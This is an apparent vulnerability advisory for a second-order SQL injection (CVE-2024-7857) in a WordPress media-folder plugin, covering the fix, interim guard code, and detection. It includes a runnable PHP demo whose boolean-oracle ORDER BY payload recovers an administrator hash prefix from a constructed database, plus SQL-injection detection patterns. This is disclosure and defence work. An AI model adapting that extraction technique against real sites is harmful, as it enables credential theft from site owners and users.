CVE-2024-7857
📋 TL;DR
The Media Library Folders WordPress plugin (slug media-library-plus) is vulnerable to second-order SQL injection through the sort_type parameter of its mlf_change_sort_type AJAX handler: the value is saved without sufficient escaping and later concatenated into an existing query that is not prepared, so any authenticated user with Subscriber-level access or higher can append SQL to that query and read data from the WordPress database, including user credentials and site data. All versions up to and including 8.2.2 are affected.
💻 Affected Systems
- Media Library Folders WordPress plugin (media-library-plus), versions 8.2.2 and earlier
📦 What is this software?
Media Library Folders (WordPress.org slug media-library-plus, from MaxFoundry) adds a folder tree on top of the WordPress media library so that uploads can be organised, moved and sorted from the admin screen. The sort_type parameter is the sort order chosen for that listing; the plugin stores it and applies it on later requests, which is what makes the injection second-order rather than direct.
⚠️ Risk & Real-World Impact
Worst Case
Read access to every table the site's database user can reach, including wp_users password hashes and wp_options values such as API keys and secret tokens. A cracked administrator hash or a reusable token then gives full site takeover. Because the parameter lands in a sort clause, extraction is usually blind (boolean or time based) rather than a direct UNION dump, which slows the attack but does not prevent it.
Likely Case
Extraction of sensitive rows from the WordPress database (user records and password hashes, plugin settings, site options) by a low-privilege authenticated account, for example a self-registered Subscriber on a site with open registration.
If Mitigated
Once the plugin is updated to 8.2.3 or later, or the AJAX action is blocked for low-privilege users, the parameter can no longer reach the query and the exposure is closed. Because the injection is second-order, a payload stored before the fix is still in the database: check the persisted sort preference values and reset any that are not a plain sort key.
🎯 Exploit Status
Exploitation requires an authenticated account, but Subscriber level is enough, which open registration or any leaked low-privilege credential provides. The vulnerable function and parameter are public (the trac links under References point at the affected lines and the fix), so reproducing the issue from the diff is straightforward.
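The second-order flow described above in runnable form, as an added illustration that is not the plugin's code: a PHP script on an in-memory SQLite database stores a sort_type value with a prepared statement (the step that looks safe in review), then interpolates the stored value into ORDER BY on a later query, and shows how a Subscriber-level user turns the resulting row order into a boolean oracle against another user's password hash. The tables, the prefs table standing in for usermeta, the sample rows and all function names are constructed for the example; the hardened version at the end maps the stored key through an allow-list at both write and read time, which is the fix pattern $wpdb->prepare() cannot supply for an ORDER BY clause.

```php
<?php
// Added illustrative example, not the plugin's code: a second-order ORDER BY
// injection rebuilt on SQLite/PDO so it runs offline. The tables, the prefs
// table standing in for usermeta, the sample rows and all names are constructed.
declare(strict_types=1);

// Fix pattern: the stored value is only ever a key into this allow-list.
const SORT_EXPRESSIONS = ['name' => 'name ASC', 'name_desc' => 'name DESC', 'id' => 'id ASC'];

function make_db(): PDO {
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, login TEXT, pass TEXT)');
    $db->exec("INSERT INTO users VALUES (1, 'admin', '\$P\$BsampleAdminHash'), (2, 'subscriber', '\$P\$BsampleSubHash')");
    $db->exec('CREATE TABLE folders (id INTEGER PRIMARY KEY, name TEXT)');
    $db->exec("INSERT INTO folders VALUES (1, 'Photos'), (2, 'Docs')");
    $db->exec('CREATE TABLE prefs (user_id INTEGER PRIMARY KEY, sort_type TEXT)'); // stand-in for usermeta
    return $db;
}

// Request 1, the AJAX handler: a prepared statement stores the value, so this
// step is not injectable on its own and looks safe in review.
function save_sort_type_vulnerable(PDO $db, int $user_id, string $sort_type): void {
    $st = $db->prepare('REPLACE INTO prefs (user_id, sort_type) VALUES (?, ?)');
    $st->execute([$user_id, $sort_type]);
}

// Request 2, any later listing: the stored value is trusted and concatenated
// into ORDER BY, where a bound parameter cannot be used. Returns folder ids in order.
function list_folders_vulnerable(PDO $db, int $user_id): array {
    $st = $db->prepare('SELECT sort_type FROM prefs WHERE user_id = ?');
    $st->execute([$user_id]);
    $sort = $st->fetchColumn() ?: 'name';
    $rows = $db->query("SELECT id FROM folders ORDER BY $sort")->fetchAll(PDO::FETCH_COLUMN);
    return array_map('intval', $rows);
}

// Attacker view (user 2): store a CASE expression whose sort order depends on a
// guess about the admin hash, then read the order back. ORDER BY name yields
// [2, 1] (Docs before Photos), ORDER BY id yields [1, 2], so the order leaks one bit.
function oracle(PDO $db, string $guess): bool {
    $n = strlen($guess);
    $payload = "CASE WHEN (SELECT substr(pass, 1, $n) FROM users WHERE id = 1) = '$guess' THEN name ELSE id END";
    save_sort_type_vulnerable($db, 2, $payload);
    return list_folders_vulnerable($db, 2) === [2, 1];
}

function recover_hash_prefix(PDO $db, int $length): string {
    $alphabet = '$./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'; // phpass alphabet plus '$'
    $known = '';
    for ($i = 0; $i < $length; $i++) {
        foreach (str_split($alphabet) as $c) {
            if (oracle($db, $known . $c)) {
                $known .= $c;
                continue 2;
            }
        }
        break; // nothing matched: stop instead of looping
    }
    return $known;
}

// Hardened handler: reject anything that is not an allow-list key at write time.
function save_sort_type_fixed(PDO $db, int $user_id, string $sort_type): bool {
    if (!array_key_exists($sort_type, SORT_EXPRESSIONS)) {
        return false;
    }
    $st = $db->prepare('REPLACE INTO prefs (user_id, sort_type) VALUES (?, ?)');
    $st->execute([$user_id, $sort_type]);
    return true;
}

// Hardened reader: map the stored key again, so a value stored before the fix
// (second-order!) falls back to the default instead of being interpolated.
function list_folders_fixed(PDO $db, int $user_id): array {
    $st = $db->prepare('SELECT sort_type FROM prefs WHERE user_id = ?');
    $st->execute([$user_id]);
    $key = (string) $st->fetchColumn();
    $order = SORT_EXPRESSIONS[$key] ?? SORT_EXPRESSIONS['name'];
    $rows = $db->query("SELECT id FROM folders ORDER BY $order")->fetchAll(PDO::FETCH_COLUMN);
    return array_map('intval', $rows);
}

$db = make_db();
printf("vulnerable: subscriber recovered admin hash prefix %s\n", recover_hash_prefix($db, 4));
printf("fixed reader with the payload still stored: %s\n", json_encode(list_folders_fixed($db, 2)));
printf("fixed writer accepts the payload: %s\n", var_export(save_sort_type_fixed($db, 2, 'id, (SELECT 1)'), true));
```

Run it with the php CLI (pdo_sqlite is bundled with most builds): the vulnerable path recovers the prefix $P$B after a few hundred requests that each only change a sort preference, the fixed reader returns the default order even though the attacker's payload is still stored, and the fixed writer refuses it. The read-side check is what matters for a second-order bug: patching the handler alone leaves any value stored before the patch live in the database.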
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 8.2.3 or later
Fix commit (plugin trac changeset; the vendor published no separate advisory on this page): https://plugins.trac.wordpress.org/changeset/3139954/media-library-plus/trunk/media-library-plus.php
Restart Required: No
Instructions:
1. Log into the WordPress admin panel.
2. Navigate to Plugins → Installed Plugins.
3. Find the Media Library Folders plugin.
4. Click 'Update Now' if an update is available.
5. Alternatively, download version 8.2.3 or later from the WordPress plugin repository and update manually.
🔧 Temporary Workarounds
Block the vulnerable AJAX action
Remove or restrict the mlf_change_sort_type AJAX action until the update is applied. The issue needs an authenticated user, so the wp_ajax_ hook is the one that matters; removing the wp_ajax_nopriv_ variant is harmless but only relevant if the plugin registers it at all.
Add to a must-use plugin (wp-content/mu-plugins/) or the active theme's functions.php. remove_action() only succeeds if the callback name and priority match how the plugin registered the hook (a plain function is assumed here; a class method would need array($instance, 'method')) and if it runs after that registration, hence the late admin_init hook, which admin-ajax.php fires before dispatching the action:
add_action('admin_init', function () {
    remove_action('wp_ajax_mlf_change_sort_type', 'mlf_change_sort_type');
    remove_action('wp_ajax_nopriv_mlf_change_sort_type', 'mlf_change_sort_type');
}, 99);
Confirm it took effect: has_action('wp_ajax_mlf_change_sort_type') should return false afterwards, and a logged-in request with action=mlf_change_sort_type should get WordPress's default "0" response instead of the plugin's output.
Reject unexpected sort_type values before the handler runs
Validate the sort_type parameter at the request boundary. A filter named pre_mlf_change_sort_type only works if the plugin itself calls apply_filters() with that name, and neither WordPress core nor anything on this page establishes such a hook, so do not rely on it without confirming it in the plugin source. A check that does not depend on the plugin's internals hooks the same AJAX action ahead of the plugin's own callback (priority 0 runs before the default priority 10) and ends the request if the value is not on the allow-list. The allowed values below are placeholders; take the real list from the plugin source:
add_action('wp_ajax_mlf_change_sort_type', function () {
    $sort_type = isset($_REQUEST['sort_type']) ? (string) wp_unslash($_REQUEST['sort_type']) : '';
    if (!in_array($sort_type, ['asc', 'desc', 'name', 'date'], true)) {
        wp_send_json_error('invalid sort_type', 400);
    }
}, 0);
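The two workarounds above combined into a single drop-in file, as an added example that is not the plugin's or WordPress core's code: a must-use plugin that refuses the mlf_change_sort_type action for anyone below a chosen capability, rejects sort_type values that are not on an allow-list, and writes what it blocked to the PHP error log so the Detection section has something to look for. The capability, the allow-list, the file and function names and the assumption that the plugin registers its handler at the default priority 10 are all choices made for this example and should be checked against the plugin source before use.

```php
<?php
/**
 * Plugin Name: CVE-2024-7857 interim guard
 * Description: Added example (not the plugin's or WordPress core's code). Refuses the
 * mlf_change_sort_type AJAX action for users below a chosen capability, rejects
 * sort_type values that are not on an allow-list, and logs what it blocked.
 * Install in wp-content/mu-plugins/ and delete after updating to 8.2.3 or later.
 */

if (!defined('ABSPATH')) {
    exit;
}

// Assumptions to edit before use: the capability that should keep the feature
// (manage_options = administrators only) and the sort_type values the plugin
// really accepts, which must be read from the plugin source; these are placeholders.
const CVE_2024_7857_REQUIRED_CAP = 'manage_options';
const CVE_2024_7857_ALLOWED_SORT_TYPES = ['asc', 'desc', 'name', 'date'];

function cve_2024_7857_guard(): void {
    $user_id   = get_current_user_id();
    $raw       = $_REQUEST['sort_type'] ?? ''; // the plugin may read GET or POST; cover both
    $sort_type = is_string($raw) ? (string) wp_unslash($raw) : '';

    if (!current_user_can(CVE_2024_7857_REQUIRED_CAP)) {
        error_log(sprintf('CVE-2024-7857 guard: user %d lacks %s, sort_type=%s',
            $user_id, CVE_2024_7857_REQUIRED_CAP, var_export($sort_type, true)));
        wp_send_json_error(['message' => 'Forbidden'], 403); // exits
    }
    if (!in_array($sort_type, CVE_2024_7857_ALLOWED_SORT_TYPES, true)) {
        error_log(sprintf('CVE-2024-7857 guard: user %d sent unexpected sort_type=%s',
            $user_id, var_export($sort_type, true)));
        wp_send_json_error(['message' => 'Invalid sort_type'], 400); // exits
    }
    // Otherwise fall through: the plugin's own callback runs next at its normal priority.
}

// Priority 0 runs before a handler registered at the default priority 10, so this
// works whether the plugin registered a plain function or a class method, and it
// does not need to know the callback's name. If the plugin uses a lower priority,
// lower this one to match.
add_action('wp_ajax_mlf_change_sort_type', 'cve_2024_7857_guard', 0);
```

The guard is deliberately coarse: while it is installed, only users with the chosen capability can change the sort order at all, which is acceptable for an interim measure on a bug that only needs Subscriber access. The error_log() lines land in the PHP error log, or in wp-content/debug.log when WP_DEBUG_LOG is enabled, and identify the account that sent the value.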
🧯 If You Can't Patch
- Temporarily deactivate the Media Library Folders plugin until it can be updated
- Disable open registration (Settings → General → Membership) and audit existing Subscriber accounts, since Subscriber-level access is all the attack needs; monitor admin-ajax.php requests with action=mlf_change_sort_type from low-privilege accounts, as database-side logs cannot attribute a query to a WordPress user
🔍 How to Verify
Check if Vulnerable:
Check WordPress admin → Plugins → Installed Plugins for Media Library Folders version 8.2.2 or earlier
Check Version:
wp plugin get media-library-plus --field=version   (WP-CLI identifies the plugin by its slug, not its display name; anything below 8.2.3 is vulnerable)
Verify Fix Applied:
Verify plugin version is 8.2.3 or later in WordPress admin panel
📡 Detection & Monitoring
Log Indicators:
- WordPress does not log SQL by default: enable query capture (SAVEQUERIES with a logging hook, or the Query Monitor plugin) or the MySQL general/slow query log, then look for ORDER BY clauses that contain subqueries, CASE expressions, SLEEP()/BENCHMARK() calls or comment sequences
- Repeated POST requests to admin-ajax.php with action=mlf_change_sort_type from one low-privilege account; a user changes a sort order a handful of times at most, so bursts of them indicate a blind-extraction loop
- Because the injection is second-order, the payload persists: inspect the stored sort preference values, wherever the plugin keeps them (the referenced source lines show the storage and use sites), for anything that is not a plain sort key
Network Indicators:
- POST requests to /wp-admin/admin-ajax.php with action=mlf_change_sort_type whose sort_type value contains SQL syntax (parentheses, quotes, SELECT/UNION/CASE, SLEEP(), comment markers); standard web-server access logs do not record POST bodies, so this needs a WAF or a request-logging layer that captures form fields
- Slow or stalled admin-ajax.php responses on later requests from the same account, consistent with time-based blind extraction; the stored value fires when the query runs, not when it is submitted
SIEM Query (Splunk-style pseudo-syntax; only useful where the log source captures request bodies, and the keyword list will also match benign text, so review hits against the allow-list of valid sort_type values):
source="wordpress.log" AND "admin-ajax.php" AND "mlf_change_sort_type" AND ("UNION" OR "SELECT" OR "CASE" OR "SLEEP(" OR "BENCHMARK(" OR "FROM" OR "WHERE" OR "ORDER BY" OR "--" OR "/*")
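The indicators above applied to a handful of log lines, as an added example that is not from the original page: a PHP command-line scanner that parses request records, ignores requests whose sort_type is on the allow-list, flags SQL-looking values separately from values that are merely unexpected, and counts non-allow-listed values per user to surface the burst pattern. Plain access logs carry no POST body, so the line format assumes a WAF audit log or request-logging plugin that records decoded form fields; that format, the allow-list and every value in the sample lines are constructed for this example.

```php
<?php
// Added example, not from the original page: the indicators above applied to
// constructed log lines. Plain access logs carry no POST body, so the lines
// assume a WAF audit log or request-logging plugin that records decoded form
// fields; the line format and every value in it are invented for this example.
declare(strict_types=1);

const ALLOWED_SORT_TYPES = ['asc', 'desc', 'name', 'date']; // placeholder: use the plugin's real values

// Any one of these inside a sort value is enough to flag it as SQL.
const SQL_MARKERS = [
    '/\bSELECT\b/i', '/\bUNION\b/i', '/\bCASE\b/i', '/\bSLEEP\s*\(/i',
    '/\bBENCHMARK\s*\(/i', '/\bEXTRACTVALUE\s*\(/i', '/\bUPDATEXML\s*\(/i',
    "/'/", '/\(/', '/--|#|\/\*/',
];

// Line shape: <ts> <ip> uid=<n> <method> <path> action=<name> [sort_type=<urlencoded>]
function parse_line(string $line): ?array {
    if (!preg_match('/^(\S+) (\S+) uid=(\d+) (\w+) (\S+) action=(\S+)(?: sort_type=(\S*))?$/', $line, $m)) {
        return null;
    }
    return [
        'ts' => $m[1], 'ip' => $m[2], 'uid' => (int) $m[3], 'method' => $m[4],
        'path' => $m[5], 'action' => $m[6],
        'sort_type' => isset($m[7]) ? urldecode($m[7]) : null,
    ];
}

// Returns null for benign lines, 'sqli' for SQL-looking values, 'unexpected'
// for anything else that is not an allow-listed value.
function classify(array $r): ?string {
    if ($r['action'] !== 'mlf_change_sort_type' || strpos($r['path'], 'admin-ajax.php') === false) {
        return null;
    }
    $v = $r['sort_type'] ?? '';
    if (in_array($v, ALLOWED_SORT_TYPES, true)) {
        return null;
    }
    foreach (SQL_MARKERS as $re) {
        if (preg_match($re, $v) === 1) {
            return 'sqli';
        }
    }
    return 'unexpected';
}

function scan(array $lines): array {
    $hits = [];
    $per_user = [];
    foreach ($lines as $line) {
        $r = parse_line($line);
        if ($r === null) {
            continue;
        }
        $kind = classify($r);
        if ($kind === null) {
            continue;
        }
        $hits[] = ['kind' => $kind, 'ts' => $r['ts'], 'uid' => $r['uid'], 'ip' => $r['ip'], 'sort_type' => $r['sort_type']];
        $per_user[$r['uid']] = ($per_user[$r['uid']] ?? 0) + 1;
    }
    return ['hits' => $hits, 'per_user' => $per_user];
}

// Constructed sample: one normal sort change, two SQL-looking values, an unrelated
// AJAX action and a value that is merely off the allow-list.
$sample = [
    '2024-08-20T10:00:01Z 203.0.113.5 uid=7 POST /wp-admin/admin-ajax.php action=mlf_change_sort_type sort_type=name',
    '2024-08-20T10:00:09Z 203.0.113.5 uid=7 POST /wp-admin/admin-ajax.php action=mlf_change_sort_type sort_type=name%2C(SELECT%20SLEEP(5))',
    '2024-08-20T10:00:10Z 203.0.113.5 uid=7 POST /wp-admin/admin-ajax.php action=mlf_change_sort_type sort_type=(CASE%20WHEN%20(SELECT%201)%3D1%20THEN%20name%20ELSE%20date%20END)',
    '2024-08-20T10:00:12Z 198.51.100.9 uid=3 POST /wp-admin/admin-ajax.php action=heartbeat',
    '2024-08-20T10:00:15Z 203.0.113.5 uid=7 POST /wp-admin/admin-ajax.php action=mlf_change_sort_type sort_type=title',
];

$result = scan($sample);
foreach ($result['hits'] as $h) {
    printf("[%s] %s uid=%d ip=%s sort_type=%s\n", $h['kind'], $h['ts'], $h['uid'], $h['ip'], $h['sort_type']);
}
foreach ($result['per_user'] as $uid => $n) {
    if ($n >= 2) {
        printf("uid=%d sent %d non-allow-listed values: compare with the value the plugin has stored for that user\n", $uid, $n);
    }
}
```

On the sample, the first and fourth lines are dropped as benign, the two SQL-looking values are reported as sqli, the bare "title" as unexpected, and uid 7 is singled out with three non-allow-listed values. Matching against the allow-list first is what keeps the keyword patterns from firing on ordinary traffic, and the per-user count is the cheap proxy for the burst pattern a blind extraction produces; the final step, comparing with the persisted sort value, is manual because that is where a second-order payload actually lives.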
🔗 References
- https://plugins.trac.wordpress.org/browser/media-library-plus/tags/8.2.2/media-library-plus.php#L1766
- https://plugins.trac.wordpress.org/browser/media-library-plus/tags/8.2.2/media-library-plus.php#L3339
- https://plugins.trac.wordpress.org/changeset/3139954/media-library-plus/trunk/media-library-plus.php
- https://www.wordfence.com/threat-intel/vulnerabilities/id/d2266254-9281-4859-8630-f7bb5c0ead19?source=cve